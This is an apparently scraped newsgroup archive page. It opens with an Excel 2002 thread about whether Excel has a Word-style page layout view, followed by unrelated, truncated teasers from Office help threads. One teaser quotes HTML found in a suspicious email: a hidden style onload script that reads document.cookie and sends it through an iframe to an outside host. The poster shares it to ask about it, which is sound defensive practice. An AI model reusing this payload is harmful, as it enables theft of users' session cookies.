Page Layout like Word?

We're using Excel 2002.

I have a user that is telling me that he works in Excel with page layout
exactly like Word (with the margins and gray area between pages).  I showed
him Print Preview, but that's not what he means.  Page Break Preview is also
not what he means because it doesn't show the margins.

Is he right?  Is there a print layout view in Excel like Word?

0
doreo715 (50)
11/1/2004 4:25:25 PM
excel 39879 articles. 2 followers. Follow

Hi
AFAIK there's no such view

--
Regards
Frank Kabel

"Doreen" <doreo715@hotmail.com> schrieb im Newsbeitrag
> We're using Excel 2002.
>
> I have a user that is telling me that he works in Excel with page
layout
> exactly like Word (with the margins and gray area between pages).  I
showed
> him Print Preview, but that's not what he means.  Page Break Preview
is also
> not what he means because it doesn't show the margins.
>
> Is he right?  Is there a print layout view in Excel like Word?

0
frank.kabel (11126)
11/1/2004 6:05:54 PM
If he's working with Charts, a chart sheet has a grey area outside of
the chart area.

If that's not it, have him describe the steps he takes to get to the
view with margins and grey area.

Doreen wrote:
> We're using Excel 2002.
>
> I have a user that is telling me that he works in Excel with page layout
> exactly like Word (with the margins and gray area between pages).  I showed
> him Print Preview, but that's not what he means.  Page Break Preview is also
> not what he means because it doesn't show the margins.
>
> Is he right?  Is there a print layout view in Excel like Word?

--
Debra Dalgleish
Excel FAQ, Tips & Book List

0
dsd1 (5911)

Does Word have a command that compares to WordPerfect Advance?
I want to advance text to a specific position within the line that is independent of the number of characters that precedes it. Tab will not work as it measures from the preceding character. WordPerfect has a command: "Typesetting" "Advance" that I use for this. Is there a comparable command in MS Word? Word does have an Advance field, mostly for compatibility with documents imported from WordPerfect. If you use the \x switch, it will position the next character at the specified location. According to the help topic on the Advance field, the \x switch &qu...

Force a page break in code
I need to force a page break in the Detail_OnFormat Event when a value changes. How do I do that? Thanks, Bill Bill wrote: > I need to force a page break in the Detail_OnFormat > Event when a value changes. How do I do that? > > Thanks, > Bill Insert a PageBreak control from the ToolBox bar at the desired location. Even though such a control is never "visible" other than in design view they do still have a Visible property. That property effectively turns on and off the PageBreak so you can minipulate that in your code. -- Rick Brandt, Microsoft Access MVP...

Word 2007: word count wrong?
Hello, I have an issue with some .doc files when opening in Word 2007. In some cases the word count in the status bar is different of the word count of the "Word Count"- window (CTRL+SHIFT+G) or the word count in Word 2003 Example file: http://go.microsoft.com/fwlink/?LinkId=79595 Word 2007 (status bar) show 61019 words Word 2007 (Word count window) show 61010 words Word 2003 also show 61010 words This issue I have not with all documents, but only with some files and it seems that I have this problem only with .doc files but not with .docx files. (installed ve...

reserved words
why can reserved words be used in a table in excel and not in acess? am using 2007, tested importing a csv file from paypal to acess and protested at the field names. fianlly can anyone recommend tutorials on youtube as comprehensive as excel is fun? thanks for the trouble. ged. On Thu, 26 Nov 2009 15:00:01 -0800, stressed windows user <stressedwindowsuser@discussions.microsoft.com> wrote: >why can reserved words be used in a table in excel and not in acess? am using >2007, tested importing a csv file from paypal to acess and protested at the >field names. fi...

Menu Page
I'd like to make a menu page with buttons to jump between spreadsheets of a workbook. I will turn off the tabs at the bottom in order to do this, but I'm looking for code for my menu buttons to flip to each spreadsheet. Also to return to the menu from a specific spreadsheet, I'd like to use a right click to jump back to the menu. Can someone help me with this. I'm used to programming in MS Access, so programming in MS Excel is a new venture for me. Thanks, PC How about an alternative... Create that index worksheet and put hyperlinks to A1 of each sheet. And then put a hyp...

Detect page change in PropertySheet?
Hi, I have a property sheet that is the parent of several property pages. If the user clicks a tab to change to another page, is there a way I can detect this (and possibly prevent the change) in the PropertySheet dialog? Does windows/MFC send any kind of message to the PropertySheet dialog? I looked at all of the over-rides and WM_ message, but cannot see anything. Thanks! Not directly. You can catch that in the CPropertyPage and relay the message to the CPropertySheet. (I know you are asking, why doesn't the CPropertySheet get the notificatio first? who knows!) AliR. "...

View as web page in OWA
in OWA 2002, i remember there is a feature "View as web page" on the right side of the email. in OWA 2003, after open the received email, such feature no longer there. Anyway to enable this feature? ...

Chart
Does anyone know if there are some "Add-Ins" for Excel that allow to use gauges that look like "Speedometers" (circular gauges)? Please refer to http://www.infommersion.com/demos/portlets/demoshell.html#demos for the kind of graph I'd like to include in a spreadsheet. Thanks, Tom Tom, see if this will work for you http://www.geocities.com/jonpeltier/Excel/Charts/Speedometer.html -- Paul B Always backup your data before trying something new Please post any response to the newsgroups so others can benefit from it Feedback on answers is always appreciated! Using Exc...

Page break preview & blue line
I using Excel 2003 In page break preview I have always do some thing wrong I'm just pull the blue line by using mouse all page was destroyed It there any tips to return the blue line to the Default pages size setting As far as I know the 'default' print area is all the data, and once you have changed the print area and saved the file you can not get it to go back to the previous setting. If you have problems with this or any other proceedure do try to remember to save your file before you do the awkward bit and then you can go back to the saved copy it it does not work. ...

How do I print only odd pages in Publisher and then only even page
I am attempting duplex printing with a printer that is unable to do duplex printing by printing odd pages first and then flipping the pages over and printing only even pages. No option is given that I can find in the print window. Help! Sarah Wright wrote: > I am attempting duplex printing with a printer that is unable to do > duplex printing by printing odd pages first and then flipping the > pages over and printing only even pages. > > No option is given that I can find in the print window. > > Help! The duplex printing add-in can be found here (http://publisherm...

M2004 Won't Save Customized Toolbars / Home Page
Unable to find anything in archives or the UFAQ on this... My Money 2004 file recently stopped saving customized toolbars / home page. Any changes I make don't "stick". I've used super salvage, which supposedly found and corrected some errors, but the problem persists. Any ideas? Thanks. Try this (and it is in the UFAQ under a less specific topic at http://umpmfaq.info/faqdb.php?q=153). Stop Money Express. Change your toolbar stuff. Exit Money. Restart Money. Restart Money Express. "Sock" <sock@wideopenwest.com> wrote in message news:8205f05b.04101407...

Word 2008 keeps crashing
I recently purchased a Macbook Pro and installed Office 2008. Whenever I type in Word or copy/paste from another document, I either get an error that says "Insufficient memory" or the application freezes and will not respond. Is there something I can do or just have to wait for an update? > This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. --B_3285228210_9363962 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit On 2/7/08 10:37 AM, in article ee8c846.-1@web...

Add a blank page separator
How do I add a blank page automatically as a separator after every 15 pages when printing a document of 250 pages? Use a macro containing the following code to print the document: Dim i As Long Dim blank As Document For i = 1 To 240 Step 15 ActiveDocument.PrintOut Range:=wdPrintFromTo, From:=i, To:=i + 15 Set blank = Documents.Add With blank .PrintOut .Close wdDoNotSaveChanges End With Next i -- Hope this helps, Doug Robbins - Word MVP Please reply only to the newsgroups unless you wish to obtain my services on a paid professio...

Can I have spell check ignore errors and alert me to real words?
Instead of stopping on misspellings and skipping real words, is there a way to stop on correct spellings to find actual words in a bunch of gibberish? Sort of an "UNspell check". For example, pass over "JJKSXO" but show me "SPELL". No, there is no way of doing that regards, Peo Sjoblom "JenLynFish" wrote: > Instead of stopping on misspellings and skipping real words, is there a way > to stop on correct spellings to find actual words in a bunch of gibberish? > Sort of an "UNspell check". For example, pass over "JJKSX...

Word 2007 Error message
Hello, I'm currently using Works Suite 2006. I am attempting to intall the Word 2007 upgrade to no avail as I receiving the following error message: SET-UP ERROR D:\wordR.ww\osetup.DLL digital signature does not validate or is not present I would appreciate any advice and/or suggestions so that I can install Word 2007. Ciao, Jerry Sorry Jerry but this is Microsoft Access forum. You need to post this question to a different group to find any useful help. "Jerry T" <Jerry T@discussions.microsoft.com> wrote in message news:B45E64C3-D080-405E-9159-CB3E7F73AFFC@micr...

Help-- Having trouble opening Word & Entourage
I have to keep restarting my computer to be able to open Word or Entourage. The icons just bounce a little but won't open. I was getting a request from Entourage to rebuild the database which I did about 6 or 7 times. I got another warning which I ignored. I am on a MacBook Pro (Intel based). I am using office 2004. My Entourage database is 3.2 gb. I ran Disk Utilities a couple of times. I also had a problem a couple of times with FileMaker Pro but not sure if related. Thanks Christina On 22/8/06 20:01, in article 1156273266.788654.318170@i42g2000cwa.googlegroups.com, "...

[ANN] "Bend Word to your Will" -- April 2005 edition free download
Dear all, THIS ANNOUNCEMENT IS ABOUT A *NON-COMMERCIAL* RESOURCE BASED IN PART ON ACCUMULATED ADVICE FROM THIS NEWSGROUP The latest version of my notes on Word -- titled "Bend Word to Your Will" -- is now available for downloading from the Word MVPs' site, http://www.mvps.org/word/FAQs/WordMac/Bend/BendWord.htm WHAT IS "BEND WORD TO YOUR WILL"? "Bend Word to Your Will" is not a commercial product for sale -- it's free. It's a dictionary-style (mainly) set of notes on Word that I've been continually adding to and polishing for the past four year...

How do I set up mixed page orientations in Publisher 2003?
I'm trying to create a duplex publication where one side is in portrait and the reverse is in landscape. I've tried looking in the halp and through all the menus but it seems that I can only have one or the other. Can anybody help? Publisher (any version) does not support this. The workaround most frequently offered is to design your landscape page, group the all the objects, then rotate 90 degrees. -- Brian Kvalheim Microsoft Publisher MVP http://www.publishermvps.com This posting is provided "AS IS" with no warranties, and confers no rights. "T. Mitchell"...

Saving as web page
When publishing spreadsheets as web pages I would like to set the page to fit within a full screen view. I have some that fit and some that don't and I've worked with the formats in Excel to fit everything within the screen on all of them, but that doesn't seem to help. Can I set the format to do this? Thank you in advance for your assistance. Jeff ...

This seems like an exploit, but what do I know?
Folks- One of my users got an e-mail message from a Yahoo user; the message had the following very interesting HTML code at the end ... <DIV id=a> </DIV> <DIV id=b style="VISIBILITY: hidden"></DIV> <STYLE onload="window.status=''; var x = escape(document.cookie).substr(0,1900) ; b.innerHTML='<iframe src=http://yahoo.game-host.org:1646/index.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\' frameborder=0 width=10 height=10></iframe>test'; " type=...

Colors matching on a page ....
Has anybody had any problems with creating a document in Publisher and using more than one color on the page, but having more than one color appear when printing? I have checked the color of the font and they are all the same...but when I print, one line may come out one color and the next one, another. Close...but not the same. And I have checked to make sure they are the same colors in every aspect. They are...until I print????? Why is this happening and how can I fix it? Liz wrote: > Has anybody had any problems with creating a document in Publisher > and using more than ...